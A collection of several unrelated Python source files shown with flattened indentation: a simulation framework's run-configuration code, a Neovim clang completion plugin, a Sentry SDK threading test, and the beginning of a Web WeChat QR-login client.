self.runInfoDict['printInput'] = text+'.xml'
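# WorkingDir resolution: an absolute path (after '~' expansion) is used as-is, the
# 'runRelative' attribute makes it relative to the launch directory, and otherwise it
# is resolved relative to the directory containing the XML input file.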
elif element.tag == 'WorkingDir':
# first store the cwd, the "CallDir"
self.runInfoDict['CallDir'] = os.getcwd()
# then get the requested "WorkingDir"
tempName = element.text
if element.text is None:
self.raiseAnError(IOError, 'RunInfo.WorkingDir is empty! Use "." to signify "work here" or specify a directory.')
if '~' in tempName:
tempName = os.path.expanduser(tempName)
if os.path.isabs(tempName):
self.runInfoDict['WorkingDir'] = tempName
elif "runRelative" in element.attrib:
self.runInfoDict['WorkingDir'] = os.path.abspath(tempName)
else:
if xmlFilename is None:
self.raiseAnError(IOError,'Relative working directory requested but xmlFilename is None.')
# store location of the input
xmlDirectory = os.path.dirname(os.path.abspath(xmlFilename))
self.runInfoDict['InputDir'] = xmlDirectory
rawRelativeWorkingDir = element.text.strip()
# working dir is file location + relative working dir
self.runInfoDict['WorkingDir'] = os.path.join(xmlDirectory,rawRelativeWorkingDir)
utils.makeDir(self.runInfoDict['WorkingDir'])
elif element.tag == 'maxQueueSize':
try:
self.runInfoDict['maxQueueSize'] = int(element.text)
except ValueError:
self.raiseAnError(IOError,'Value given for RunInfo.maxQueueSize could not be converted to integer: {}'.format(element.text))
elif element.tag == 'RemoteRunCommand':
tempName = element.text
if '~' in tempName:
tempName = os.path.expanduser(tempName)
if os.path.isabs(tempName):
self.runInfoDict['RemoteRunCommand'] = tempName
else:
self.runInfoDict['RemoteRunCommand'] = os.path.abspath(os.path.join(self.runInfoDict['FrameworkDir'],tempName))
elif element.tag == 'NodeParameter':
self.runInfoDict['NodeParameter'] = element.text.strip()
elif element.tag == 'MPIExec':
self.runInfoDict['MPIExec'] = element.text.strip()
elif element.tag == 'JobName':
self.runInfoDict['JobName' ] = element.text.strip()
elif element.tag == 'ParallelCommand':
self.runInfoDict['ParallelCommand' ] = element.text.strip()
elif element.tag == 'queueingSoftware':
self.runInfoDict['queueingSoftware' ] = element.text.strip()
elif element.tag == 'ThreadingCommand':
self.runInfoDict['ThreadingCommand' ] = element.text.strip()
elif element.tag == 'NumThreads':
self.runInfoDict['NumThreads' ] = int(element.text)
elif element.tag == 'totalNumCoresUsed':
self.runInfoDict['totalNumCoresUsed' ] = int(element.text)
elif element.tag == 'NumMPI':
self.runInfoDict['NumMPI' ] = int(element.text)
elif element.tag == 'internalParallel':
self.runInfoDict['internalParallel' ] = utils.interpretBoolean(element.text)
elif element.tag == 'batchSize':
self.runInfoDict['batchSize' ] = int(element.text)
elif element.tag.lower() == 'maxqueuesize':
self.runInfoDict['maxQueueSize' ] = int(element.text)
elif element.tag == 'MaxLogFileSize':
self.runInfoDict['MaxLogFileSize' ] = int(element.text)
elif element.tag == 'precommand':
self.runInfoDict['precommand' ] = element.text
elif element.tag == 'postcommand':
self.runInfoDict['postcommand' ] = element.text
elif element.tag == 'deleteOutExtension':
self.runInfoDict['deleteOutExtension'] = element.text.strip().split(',')
elif element.tag == 'delSucLogFiles' :
if utils.stringIsTrue(element.text):
self.runInfoDict['delSucLogFiles' ] = True
else:
self.runInfoDict['delSucLogFiles' ] = False
elif element.tag == 'logfileBuffer':
self.runInfoDict['logfileBuffer'] = utils.convertMultipleToBytes(element.text.lower())
elif element.tag == 'clusterParameters':
self.runInfoDict['clusterParameters'].extend(splitCommand(element.text)) #extend to allow adding parameters at different points.
elif element.tag == 'mode' :
self.runInfoDict['mode'] = element.text.strip().lower()
#parallel environment
if self.runInfoDict['mode'] in self.__modeHandlerDict:
self.__modeHandler = self.__modeHandlerDict[self.runInfoDict['mode']](self)
self.__modeHandler.XMLread(element)
else:
self.raiseAnError(IOError,"Unknown mode "+self.runInfoDict['mode'])
elif element.tag == 'expectedTime':
self.runInfoDict['expectedTime' ] = element.text.strip()
elif element.tag == 'Sequence':
for stepName in element.text.split(','):
self.stepSequenceList.append(stepName.strip())
elif element.tag == 'DefaultInputFile':
self.runInfoDict['DefaultInputFile'] = element.text.strip()
elif element.tag == 'CustomMode' :
modeName = element.text.strip()
modeClass = element.attrib["class"]
modeFile = element.attrib["file"]
#XXX This depends on if the working directory has been set yet.
# So switching the order of WorkingDir and CustomMode can
# cause different results.
modeFile = modeFile.replace("%BASE_WORKING_DIR%",self.runInfoDict['WorkingDir'])
modeFile = modeFile.replace("%FRAMEWORK_DIR%",self.runInfoDict['FrameworkDir'])
modeDir, modeFilename = os.path.split(modeFile)
if modeFilename.endswith(".py"):
modeModulename = modeFilename[:-3]
else:
modeModulename = modeFilename
os.sys.path.append(modeDir)
module = __import__(modeModulename)
if modeName in self.__modeHandlerDict:
self.raiseAWarning("duplicate mode definition " + modeName)
self.__modeHandlerDict[modeName] = module.__dict__[modeClass]
else:
self.raiseAnError(IOError,'RunInfo element "'+element.tag +'" unknown!')
def printDicts(self):
"""
utility function to print a summary of the dictionaries
@ In, None
@ Out, None
"""
def __prntDict(Dict,msg):
"""utility function capable to print a dictionary"""
for key in Dict:
msg+=key+'= '+str(Dict[key])+'\n'
return msg
msg=''
msg=__prntDict(self.runInfoDict,msg)
msg=__prntDict(self.stepsDict,msg)
msg=__prntDict(self.dataDict,msg)
msg=__prntDict(self.samplersDict,msg)
msg=__prntDict(self.modelsDict,msg)
msg=__prntDict(self.metricsDict,msg)
#msg=__prntDict(self.testsDict,msg)
msg=__prntDict(self.filesDict,msg)
msg=__prntDict(self.dataBasesDict,msg)
msg=__prntDict(self.outStreamsDict,msg)
msg=__prntDict(self.entityModules,msg)
msg=__prntDict(self.entities,msg)
self.raiseADebug(msg)
def run(self):
"""
Run the simulation
@ In, None
@ Out, None
"""
#to do list
#TODO: can we remove the check on the existence of the file? It might make more sense to check only for files that are inputs, right before the step that uses them
self.raiseADebug('entering the run')
#controlling the PBS environment
remoteRunCommand = self.__modeHandler.remoteRunCommand(dict(self.runInfoDict))
if remoteRunCommand is not None:
subprocess.call(args=remoteRunCommand["args"],
cwd=remoteRunCommand.get("cwd", None),
env=remoteRunCommand.get("env", None))
return
#loop over the steps of the simulation
for stepName in self.stepSequenceList:
stepInstance = self.stepsDict[stepName] #retrieve the instance of the step
self.raiseAMessage('-'*2+' Beginning step {0:50}'.format(stepName+' of type: '+stepInstance.type)+2*'-')#,color='green')
self.runInfoDict['stepName'] = stepName #provide the name of the step to runInfoDict
stepInputDict = {} #initialize the input dictionary for a step. Never use an old one!!!!!
stepInputDict['Input' ] = [] #set the Input to an empty list
stepInputDict['Output'] = [] #set the Output to an empty list
#fill the step input dictionary; just to recall: key = role played in the step, b = Class, c = Type, d = user-given name
for [key,b,c,d] in stepInstance.parList:
#Only for input and output we allow more than one object passed to the step, so for those we build a list
if key == 'Input' or key == 'Output':
stepInputDict[key].append(self.entities[b][d])
else:
stepInputDict[key] = self.entities[b][d]
#add the global objects
stepInputDict['jobHandler'] = self.jobHandler
#generate the needed assembler to send to the step
for key in stepInputDict.keys():
if type(stepInputDict[key]) == list:
stepindict = stepInputDict[key]
else:
stepindict = [stepInputDict[key]]
# check assembler. NB. If the assembler refers to an internal object the relative dictionary
# needs to have the format {'internal':[(None,'variableName'),(None,'variable name')]}
for stp in stepindict:
self.generateAllAssemblers(stp)
#if 'Sampler' in stepInputDict.keys(): stepInputDict['Sampler'].generateDistributions(self.distributionsDict)
#running a step
stepInstance.takeAstep(stepInputDict)
#---------------here what is going on? Please add comments-----------------
for output in stepInputDict['Output']:
if self.FIXME:
self.raiseAMessage('This is for the filter, it needs to go when the filtering strategy is done')
if "finalize" in dir(output):
output.finalize()
self.raiseAMessage('-'*2+' End step {0:50} '.format(stepName+' of type: '+stepInstance.type)+2*'-'+'\n')#,color='green')
self.jobHandler.shutdown()
self.messageHandler.printWarnings()
# implicitly, the job finished successfully if we got here.
self.writeStatusFile()
self.raiseAMessage('Run complete!', forcePrint=True)
def generateAllAssemblers(self, objectInstance):
"""
This method is used to generate all assembler objects at the Step construction stage
@ In, objectInstance, Instance, Instance of RAVEN entity, i.e. Input, Sampler, Model
@ Out, None
"""
if "whatDoINeed" in dir(objectInstance):
neededobjs = {}
neededObjects = objectInstance.whatDoINeed()
for mainClassStr in neededObjects.keys():
if mainClassStr not in self.entities.keys() and mainClassStr != 'internal':
self.raiseAnError(IOError,'Main Class '+mainClassStr+' needed by '+objectInstance.name+' unknown!')
neededobjs[mainClassStr] = {}
for obj in neededObjects[mainClassStr]:
if obj[1] in vars(self):
neededobjs[mainClassStr][obj[1]] = vars(self)[obj[1]]
elif obj[1] in self.entities[mainClassStr].keys():
if obj[0]:
if obj[0] not in self.entities[mainClassStr][obj[1]].type:
self.raiseAnError(IOError,'Type of requested object '+obj[1]+' does not match the actual type!'+ obj[0] + ' != ' + self.entities[mainClassStr][obj[1]].type)
neededobjs[mainClassStr][obj[1]] = self.entities[mainClassStr][obj[1]]
self.generateAllAssemblers(neededobjs[mainClassStr][obj[1]])
elif obj[1] == 'all':
# if 'all' we get all the objects of a certain 'mainClassStr'
for allObject in self.entities[mainClassStr]:
neededobjs[mainClassStr][allObject] = self.entities[mainClassStr][allObject]
else:
self.raiseAnError(IOError,'Requested object <{n}> is not part of the Main Class <{m}>!'
.format(n=obj[1], m=mainClassStr) +
'\nOptions are:', self.entities[mainClassStr].keys())
objectInstance.generateAssembler(neededobjs)
def clearStatusFile(self):
"""
Remove the status file from disk so we can really tell when RAVEN has successfully finished.
This doesn't seem to be a very robust strategy, but it is working for now.
@ In, None
@ Out, None
"""
try:
os.remove('.ravenStatus')
except OSError as e:
if os.path.isfile('.ravenStatus'):
self.raiseAWarning(f'RAVEN status file detected but not removable! Got: "{e}"')
def writeStatusFile(self):
"""
Write a status file to disk so we can really tell when RAVEN has successfully finished.
This doesn't seem to be a very robust strategy, but it is working for now.
@ In, None
@ Out, None
"""
with open('.ravenStatus', 'w') as f:
f.writelines('Success')
|
ncm2_pyclang_proc.py
|
# -*- coding: utf-8 -*-
from ncm2 import Ncm2Source, getLogger, Popen
import subprocess
import re
from os.path import dirname
from os import path, scandir
import vim
import json
import shlex
import time
import threading
import queue
import traceback
from distutils.spawn import find_executable
import sys
sys.path.insert(0, path.join(dirname(__file__), '3rd'))
from ncm2_pyclang import args_from_cmake, args_from_clang_complete, args_from_kbuild
from clang import cindex
from clang.cindex import CodeCompletionResult, CompletionString, SourceLocation, Cursor, File, Diagnostic
logger = getLogger(__name__)
class ErrTaskCancel(Exception):
pass
class Source(Ncm2Source):
def __init__(self, nvim):
Ncm2Source.__init__(self, nvim)
library_path = nvim.vars['ncm2_pyclang#library_path']
if path.isdir(library_path):
cindex.Config.set_library_path(library_path)
elif path.isfile(library_path):
cindex.Config.set_library_file(library_path)
cindex.Config.set_compatibility_check(False)
self.cmpl_index = cindex.Index.create(excludeDecls=False)
self.goto_index = cindex.Index.create(excludeDecls=False)
self.cmpl_tu = {}
self.goto_tu = {}
self.queue = queue.Queue()
self.worker = threading.Thread(target=self.worker_loop)
self.worker.daemon = True
self.worker.start()
gcc_path = nvim.vars['ncm2_pyclang#gcc_path']
auto_detect = nvim.vars['ncm2_pyclang#detect_sys_inc_args']
sys_inc = {}
gcc_exe = find_executable(gcc_path)
if auto_detect and gcc_exe:
sys_inc['cpp'] = self.get_system_include(gcc_exe, ['-xc++'])
sys_inc['c'] = self.get_system_include(gcc_exe, ['-xc'])
else:
if auto_detect:
# warn the user if auto detection failed
nvim.call('ncm2_pyclang#warn', 'g:ncm2_pyclang#gcc_path (' + gcc_path \
+ ') exe not found, falling back to ncm2_pyclang#sys_inc_args_fallback')
sys_inc = nvim.vars['ncm2_pyclang#sys_inc_args_fallback']
self.args_system_include = sys_inc
def get_system_include(self, gcc, args):
# $ gcc -xc++ -E -Wp,-v -
# ignoring duplicate directory "/usr/include/x86_64-linux-gnu/c++/7"
# ignoring nonexistent directory "/usr/local/include/x86_64-linux-gnu"
# ignoring nonexistent directory "/usr/lib/gcc/x86_64-linux-gnu/7/../../../../x86_64-linux-gnu/include"
# #include "..." search starts here:
# #include <...> search starts here:
# /usr/include/c++/7
# /usr/include/x86_64-linux-gnu/c++/7
# /usr/include/c++/7/backward
# /usr/lib/gcc/x86_64-linux-gnu/7/include
# /usr/local/include
# /usr/lib/gcc/x86_64-linux-gnu/7/include-fixed
# /usr/include/x86_64-linux-gnu
# /usr/include
# End of search list.
args += ['-E', '-Wp,-v', '-']
gcc_is_cygwin = sys.platform == 'win32'
# If gcc is installed under Cygwin or MinGW, we need to prefix the include
# directories with the cygwin/mingw base path
prefix = ''
if gcc_is_cygwin:
gcc_dir = dirname(gcc)
if gcc_dir.endswith('\\usr\\bin'):
prefix = gcc_dir[ : len(gcc_dir) - len('usr\\bin')]
elif gcc_dir.endswith('\\bin'):
prefix = gcc_dir[ : len(gcc_dir) - len('bin')]
proc = Popen(args=[gcc] + args,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
outdata, errdata = proc.communicate('', timeout=2)
errdata = errdata.decode()
lines = errdata.split('\n')
res = []
for line in lines:
if line.startswith(' /'):
inc_dir = line.strip()
res += ['-isystem', prefix + inc_dir]
# cygwin uses symlink /usr/lib -> /lib, the directory cannot be
# accessed with Windows file explorer
if gcc_is_cygwin and inc_dir.startswith('/usr/lib/'):
res += ['-isystem', prefix + inc_dir.replace('/usr/lib/', '/lib/')]
logger.debug('system include: %s', res)
return res
def join_queue(self):
if self.worker.is_alive() and \
self.worker is not threading.current_thread():
self.queue.join()
def worker_loop(self):
while True:
name, task = self.queue.get()
if task is None:
break
logger.info('begin task %s', name)
try:
task()
logger.info('task %s finished', name)
except ErrTaskCancel as ex:
logger.info('task %s canceled, %s', name, ex)
except Exception as ex:
traceback.print_exc()
logger.exception('exception: %s', ex)
finally:
self.queue.task_done()
def notify(self, method: str, *args):
self.nvim.call(method, *args, async_=True)
def get_args_dir(self, data):
self.join_queue()
context = data['context']
cwd = data['cwd']
database_path = data['database_path']
filepath = context['filepath']
args_file_path = data['args_file_path']
args, run_dir = args_from_cmake(filepath, cwd, database_path)
if args is None:
args, run_dir = args_from_kbuild(filepath, cwd)
if args is None:
args, run_dir = args_from_clang_complete(filepath, cwd, args_file_path)
if args is None:
args = []
if run_dir is None:
run_dir = cwd
if context['scope'] == 'cpp':
args.append('-xc++')
stdinc = 'cpp'
elif context['filetype'] == 'cpp':
args.append('-xc++')
stdinc = 'cpp'
else:
args.append('-xc')
stdinc = 'c'
if '-nostdinc' not in args:
args += self.args_system_include[stdinc]
return [args, run_dir]
def cache_add(self, data, lines):
self.join_queue()
self.do_cache_add(data, lines, True)
self.do_cache_add(data, lines, False)
def do_cache_add(self, data, lines, for_completion):
context = data['context']
src = self.get_src("\n".join(lines), context)
filepath = context['filepath']
changedtick = context['changedtick']
args, directory = self.get_args_dir(data)
start = time.time()
if for_completion:
cache = self.cmpl_tu
else:
cache = self.goto_tu
check = dict(args=args, directory=directory)
if filepath in cache:
item = cache[filepath]
if check == item['check']:
tu = item['tu']
if changedtick == item['changedtick']:
logger.info("changedtick is the same, skip reparse")
return
self.reparse_tu(tu, filepath, src)
logger.debug("cache_add reparse existing done")
return
del cache[filepath]
item = {}
item['check'] = check
item['changedtick'] = changedtick
tu = self.create_tu(filepath, args, directory, src,
for_completion=for_completion)
item['tu'] = tu
cache[filepath] = item
end = time.time()
logger.debug("cache_add done cmpl[%s]. time: %s",
for_completion,
end - start)
def cache_del(self, filepath):
self.join_queue()
if filepath in self.cmpl_tu:
del self.cmpl_tu[filepath]
logger.info('completion cache %s has been removed', filepath)
if filepath in self.goto_tu:
del self.goto_tu[filepath]
logger.info('goto cache %s has been removed', filepath)
def get_tu(self, filepath, args, directory, src, for_completion=False):
if for_completion:
cache = self.cmpl_tu
else:
cache = self.goto_tu
check = dict(args=args, directory=directory)
if filepath in cache:
item = cache[filepath]
tu = item['tu']
if check == item['check']:
logger.info("%s tu is cached", filepath)
self.reparse_tu(tu, filepath, src)
return item['tu']
logger.info("%s tu invalidated by check %s -> %s",
filepath, check, item['check'])
self.cache_del(filepath)
logger.info("cache miss")
return self.create_tu(filepath,
args,
directory,
src,
for_completion=for_completion)
def create_tu(self, filepath, args, directory, src, for_completion):
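# These two flag bits are not exposed by the bundled python bindings, so the raw
# values are used directly; 0x100 and 0x200 should correspond to libclang's
# CXTranslationUnit_CreatePreambleOnFirstParse and CXTranslationUnit_KeepGoing.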
CXTranslationUnit_KeepGoing = 0x200
CXTranslationUnit_CreatePreambleOnFirstParse = 0x100
args = ['-working-directory=' + directory] + args
if not for_completion:
flags = cindex.TranslationUnit.PARSE_PRECOMPILED_PREAMBLE | \
cindex.TranslationUnit.PARSE_INCOMPLETE | \
CXTranslationUnit_CreatePreambleOnFirstParse | \
cindex.TranslationUnit.PARSE_DETAILED_PROCESSING_RECORD | \
CXTranslationUnit_KeepGoing
else:
flags = cindex.TranslationUnit.PARSE_PRECOMPILED_PREAMBLE | \
cindex.TranslationUnit.PARSE_INCOMPLETE | \
CXTranslationUnit_CreatePreambleOnFirstParse | \
cindex.TranslationUnit.PARSE_CACHE_COMPLETION_RESULTS | \
cindex.TranslationUnit.PARSE_SKIP_FUNCTION_BODIES | \
CXTranslationUnit_KeepGoing
logger.info("flags %s", flags)
unsaved = (filepath, src)
if for_completion:
index = self.cmpl_index
else:
index = self.goto_index
tu = index.parse(filepath, args, [unsaved], flags)
return tu
def reparse_tu(self, tu, filepath, src):
unsaved = (filepath, src)
tu.reparse([unsaved])
include_pat = re.compile(r'^\s*#include\s+["<]([^"<]*)$')
include_base_pat = re.compile(r'([^/"<]*)$')
def get_include_completions(self, data, args, directory, inc_typed):
context = data['context']
includes = []
next_is_include = False
opts = ['-I', '-isystem', '-internal-isystem',
'-internal-externc-isystem']
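# Collect include search directories from the compile args: both the two-argument
# form ("-I", "dir") and the joined form ("-Idir", or a longer option immediately
# followed by a separator and the path) are handled by the branches below.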
for arg in args:
if not next_is_include:
if arg in opts:
next_is_include = True
continue
for opt in opts:
if arg.startswith(opt):
start = len(opt)
if start > 2:
start += 1
includes.append(arg[start:])
break
continue
includes.append(arg)
next_is_include = False
includes = [path.normpath(path.join(directory, inc))
for inc in includes]
# current file path
if context['filepath']:
includes.append(dirname(context['filepath']))
# remove duplicate
includes = list(set(includes))
logger.debug("includes to search: %s", includes)
matches = []
matcher = self.matcher_get(context['matcher'])
sub_dir = dirname(inc_typed) # type: str
sub_dir = sub_dir.strip('/')
base = self.include_base_pat.search(inc_typed).group(1)
for inc in includes:
try:
for entry in scandir(path.join(inc, sub_dir)):
name = entry.name
match = self.match_formalize(context, name)
match['menu'] = path.join(inc, sub_dir, name)
if entry.is_dir():
match['menu'] += '/'
if not matcher(base, match):
continue
matches.append(match)
except:
logger.exception('scandir failed for %s', inc)
startccol = context['ccol'] - len(base)
cb = lambda: self.complete(context, startccol, matches)
self.nvim.async_call(cb)
def on_complete(self, context, data, lines):
self.on_complete_context_id = context['context_id']
self.queue.put(['on_complete',
lambda: self.on_complete_task(context, data, lines)])
def on_complete_task(self, context, data, lines):
context_id = context['context_id']
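# Cooperative cancellation: on_complete() records the newest context_id, and this
# worker task aborts with ErrTaskCancel at each checkpoint once a newer completion
# request has superseded it.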
def check_context_id(info, *args):
if context_id != self.on_complete_context_id:
raise ErrTaskCancel(info % (*args,))
data['context'] = context
src = self.get_src("\n".join(lines), context)
filepath = context['filepath']
startccol = context['startccol']
bcol = context['bcol']
lnum = context['lnum']
base = context['base']
typed = context['typed']
check_context_id('get_args_dir')
args, directory = self.get_args_dir(data)
inc_match = self.include_pat.search(typed)
if inc_match:
self.get_include_completions(data,
args,
directory,
inc_match.group(1))
return
start = time.time()
check_context_id('get_tu')
tu = self.get_tu(filepath, args, directory, src)
check_context_id('codeComplete')
unsaved = [filepath, src]
cr = tu.codeComplete(filepath,
lnum,
bcol,
[unsaved],
include_macros=True,
include_code_patterns=True)
results = cr.results
cr_end = time.time()
matcher = self.matcher_get(context['matcher'])
matches = []
for i, res in enumerate(results):
now = time.time()
check_context_id('complete result %s/%s', i + 1, len(results))
item = self.format_complete_item(context, matcher, base, res)
if item is None:
continue
# filter out operator overloads, they're kind of useless for completion
if item['word'].startswith('operator '):
continue
item = self.match_formalize(context, item)
if not matcher(base, item):
continue
matches.append(item)
end = time.time()
logger.debug("total time: %s, codeComplete time: %s, matches %s -> %s",
end - start, cr_end - start, len(results), len(matches))
cb = lambda: self.complete(context, startccol, matches)
self.nvim.async_call(cb)
def format_complete_item(self, context, matcher, base, result):
result_type = None
word = ''
snippet = ''
info = ''
def roll_out_optional(chunks: CompletionString):
result = []
word = ""
for chunk in chunks:
if chunk.isKindInformative():
continue
if chunk.isKindResultType():
continue
if chunk.isKindTypedText():
continue
word += chunk.spelling
if chunk.isKindOptional():
result += roll_out_optional(chunk.string)
return [word] + result
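# Walk the completion chunks once: the TypedText chunk becomes the completed word
# (matched early so hopeless candidates are dropped cheaply), the ResultType chunk is
# prepended to the menu, and placeholder/optional chunks become numbered LSP-style
# snippet placeholders.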
placeholder_num = 1
for chunk in result.string:
if chunk.isKindTypedText():
# filter the matches earlier for performance
tmp = self.match_formalize(context, chunk.spelling)
if not matcher(base, tmp):
return None
word = chunk.spelling
if chunk.isKindInformative():
continue
if chunk.isKindResultType():
result_type = chunk
continue
chunk_text = chunk.spelling
if chunk.isKindOptional():
for arg in roll_out_optional(chunk.string):
snippet += self.lsp_snippet_placeholder(
placeholder_num, arg)
placeholder_num += 1
info += "[" + arg + "]"
elif chunk.isKindPlaceHolder():
snippet += self.lsp_snippet_placeholder(
placeholder_num, chunk_text)
placeholder_num += 1
info += chunk_text
else:
snippet += chunk_text
info += chunk_text
menu = info
if result_type:
result_text = result_type.spelling
menu = result_text + " " + menu
completion = dict()
completion['word'] = word
ud = {}
if snippet != word:
ud['is_snippet'] = 1
ud['snippet'] = snippet
completion['user_data'] = ud
completion['menu'] = menu
completion['info'] = info
completion['dup'] = 1
return completion
def lsp_snippet_placeholder(self, num, txt=''):
txt = txt.replace('\\', '\\\\')
txt = txt.replace('$', r'\$')
txt = txt.replace('}', r'\}')
if txt == '':
return '${%s}' % num
return '${%s:%s}' % (num, txt)
def find_declaration(self, data, lines):
self.join_queue()
context = data['context']
src = self.get_src("\n".join(lines), context)
filepath = context['filepath']
bcol = context['bcol']
lnum = context['lnum']
args, directory = self.get_args_dir(data)
tu = self.get_tu(filepath, args, directory, src)
f = File.from_name(tu, filepath)
location = SourceLocation.from_position(tu, f, lnum, bcol)
cursor = Cursor.from_location(tu, location)
defs = [cursor.get_definition(), cursor.referenced]
for d in defs:
if d is None:
logger.info("d None")
continue
d_loc = d.location
if d_loc.file is None:
logger.info("location.file None")
continue
ret = {}
ret['file'] = d_loc.file.name
ret['lnum'] = d_loc.line
ret['bcol'] = d_loc.column
return ret
# we failed to find the declaration, maybe there's a syntax error
# stopping us. Report it to the user.
logger.info('reading Diagnostic for this tu, args: %s', args)
for diag in tu.diagnostics:
# type: Diagnostic
if diag.severity < diag.Error:
continue
self.nvim.call('ncm2_pyclang#error', diag.format())
return {}
source = Source(vim)
on_complete = source.on_complete
cache_add = source.cache_add
find_declaration = source.find_declaration
cache_del = source.cache_del
get_args_dir = source.get_args_dir
|
test_contextvars.py
|
import pytest
import random
import time
from sentry_sdk.utils import _is_threading_local_monkey_patched
@pytest.mark.forked
def test_thread_local_is_patched(maybe_monkeypatched_threading):
if maybe_monkeypatched_threading is None:
assert not _is_threading_local_monkey_patched()
else:
assert _is_threading_local_monkey_patched()
@pytest.mark.forked
def test_leaks(maybe_monkeypatched_threading):
import threading
# Need to explicitly call _get_contextvars because the SDK has already
# decided upon gevent on import.
from sentry_sdk import utils
_, ContextVar = utils._get_contextvars()
ts = []
var = ContextVar("test_contextvar_leaks")
success = []
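# Each thread stores its own random value in the context variable and repeatedly
# yields control; if the (possibly monkey-patched) threading.local / contextvars
# implementation leaked values across threads, the assertion inside run() would fail.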
def run():
value = int(random.random() * 1000)
var.set(value)
for _ in range(100):
time.sleep(0)
assert var.get(None) == value
success.append(1)
for _ in range(20):
t = threading.Thread(target=run)
t.start()
ts.append(t)
for t in ts:
t.join()
assert len(success) == 20
|
weixin.py
|
#!/usr/bin/env python
# coding: utf-8
import qrcode
import urllib
import urllib2
import cookielib
import requests
import xml.dom.minidom
import json
import time
import re
import sys
import os
import subprocess
import random
import multiprocessing
import platform
import logging
import httplib
import datetime
from collections import defaultdict
from urlparse import urlparse
from lxml import html
from name_dict import name_dict
from name_dict import name_abbr
from id_group import id_dict
#import pdb
print sys.getdefaultencoding()
reload(sys)
sys.setdefaultencoding('utf8')
print sys.getdefaultencoding()
# for media upload
import mimetypes
from requests_toolbelt.multipart.encoder import MultipartEncoder
memberNum = 15
state_in = [0 for i in range(memberNum)]
date_time_init = datetime.datetime.now() - datetime.timedelta(2)
time_init_temp = date_time_init.strftime('%Y-%m-%d %H:%M')
time_init = datetime.datetime.strptime(time_init_temp, '%Y-%m-%d %H:%M')
last_login = [time_init for i in range(memberNum)]
online_time = [[datetime.timedelta(0) for i in range(memberNum)] for i in range(7)]
def catchKeyboardInterrupt(fn):
def wrapper(*args):
try:
return fn(*args)
except KeyboardInterrupt:
print '\n[*] Force quitting the program'
logging.debug('[*] Force quitting the program')
return wrapper
def _decode_list(data):
rv = []
for item in data:
if isinstance(item, unicode):
item = item.encode('utf-8')
elif isinstance(item, list):
item = _decode_list(item)
elif isinstance(item, dict):
item = _decode_dict(item)
rv.append(item)
return rv
def _decode_dict(data):
rv = {}
for key, value in data.iteritems():
if isinstance(key, unicode):
key = key.encode('utf-8')
if isinstance(value, unicode):
value = value.encode('utf-8')
elif isinstance(value, list):
value = _decode_list(value)
elif isinstance(value, dict):
value = _decode_dict(value)
rv[key] = value
return rv
class WebWeixin(object):
def __str__(self):
description = \
"=========================\n" + \
"[#] Web Weixin\n" + \
"[#] Debug Mode: " + str(self.DEBUG) + "\n" + \
"[#] Uuid: " + self.uuid + "\n" + \
"[#] Uin: " + str(self.uin) + "\n" + \
"[#] Sid: " + self.sid + "\n" + \
"[#] Skey: " + self.skey + "\n" + \
"[#] DeviceId: " + self.deviceId + "\n" + \
"[#] PassTicket: " + self.pass_ticket + "\n" + \
"========================="
return description
def __init__(self):
self.DEBUG = False
self.uuid = ''
self.base_uri = ''
self.redirect_uri = ''
self.uin = ''
self.sid = ''
self.skey = ''
self.pass_ticket = ''
self.deviceId = 'e' + repr(random.random())[2:17]
self.BaseRequest = {}
self.synckey = ''
self.SyncKey = []
self.User = []
self.MemberList = []
self.ContactList = [] # friends
self.GroupList = [] # group chats
self.GroupMemeberList = [] # group members
self.PublicUsersList = [] # official/service accounts
self.SpecialUsersList = [] # special accounts
self.autoReplyMode = False
self.syncHost = ''
self.user_agent = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.109 Safari/537.36'
self.interactive = False
self.autoOpen = False
self.saveFolder = os.path.join(os.getcwd(), 'saved')
self.saveSubFolders = {'webwxgeticon': 'icons', 'webwxgetheadimg': 'headimgs', 'webwxgetmsgimg': 'msgimgs',
'webwxgetvideo': 'videos', 'webwxgetvoice': 'voices', '_showQRCodeImg': 'qrcodes'}
self.appid = 'wx782c26e4c19acffb'
self.lang = 'zh_CN'
self.lastCheckTs = time.time()
self.memberCount = 0
self.SpecialUsers = ['newsapp', 'fmessage', 'filehelper', 'weibo', 'qqmail', 'fmessage', 'tmessage', 'qmessage', 'qqsync', 'floatbottle', 'lbsapp', 'shakeapp', 'medianote', 'qqfriend', 'readerapp', 'blogapp', 'facebookapp', 'masssendapp', 'meishiapp', 'feedsapp',
'voip', 'blogappweixin', 'weixin', 'brandsessionholder', 'weixinreminder', 'wxid_novlwrv3lqwv11', 'gh_22b87fa7cb3c', 'officialaccounts', 'notification_messages', 'wxid_novlwrv3lqwv11', 'gh_22b87fa7cb3c', 'wxitil', 'userexperience_alarm', 'notification_messages']
self.TimeOut = 20 # minimum sync interval (unit: seconds)
self.media_count = -1
self.cookie = cookielib.CookieJar()
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(self.cookie))
opener.addheaders = [('User-agent', self.user_agent)]
urllib2.install_opener(opener)
def loadConfig(self, config):
if config['DEBUG']:
self.DEBUG = config['DEBUG']
if config['autoReplyMode']:
self.autoReplyMode = config['autoReplyMode']
if config['user_agent']:
self.user_agent = config['user_agent']
if config['interactive']:
self.interactive = config['interactive']
if config['autoOpen']:
self.autoOpen = config['autoOpen']
def getUUID(self):
url = 'https://login.weixin.qq.com/jslogin'
params = {
'appid': self.appid,
'fun': 'new',
'lang': self.lang,
'_': int(time.time()),
}
data = self._post(url, params, False)
if data == '':
return False
regx = r'window.QRLogin.code = (\d+); window.QRLogin.uuid = "(\S+?)"'
pm = re.search(regx, data)
if pm:
code = pm.group(1)
self.uuid = pm.group(2)
return code == '200'
return False
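    # Illustrative note (assumption about the jslogin reply format, inferred
    # from the regex above): the endpoint answers with a small JS snippet like
    #     window.QRLogin.code = 200; window.QRLogin.uuid = "Qb2XZtbjXw==";
    # so code == '200' means a login uuid was issued successfully.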
def genQRCode(self):
#return self._showQRCodeImg()
if sys.platform.startswith('win'):
self._showQRCodeImg('win')
elif sys.platform.find('darwin') >= 0:
self._showQRCodeImg('macos')
else:
self._str2qr('https://login.weixin.qq.com/l/' + self.uuid)
def _showQRCodeImg(self, os1):
url = 'https://login.weixin.qq.com/qrcode/' + self.uuid
params = {
't': 'webwx',
'_': int(time.time())
}
data = self._post(url, params, False)
if data == '':
return
QRCODE_PATH = self._saveFile('qrcode.jpg', data, '_showQRCodeImg')
if os1 == 'win':
os.startfile(QRCODE_PATH)
elif os1 == 'macos':
